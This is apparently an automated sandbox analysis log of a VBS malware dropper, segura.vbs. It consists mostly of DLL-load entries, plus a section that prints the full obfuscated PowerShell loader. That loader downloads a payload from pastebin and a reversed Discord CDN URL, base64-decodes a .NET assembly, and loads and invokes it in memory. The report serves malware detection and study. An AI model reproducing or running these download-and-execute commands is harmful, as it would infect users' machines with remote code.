Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: segura.vbs Static file information: File size 15017006 > 1048576

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\segura.vbs');powershell $Yolopolhggobek;$global:?
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.r
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU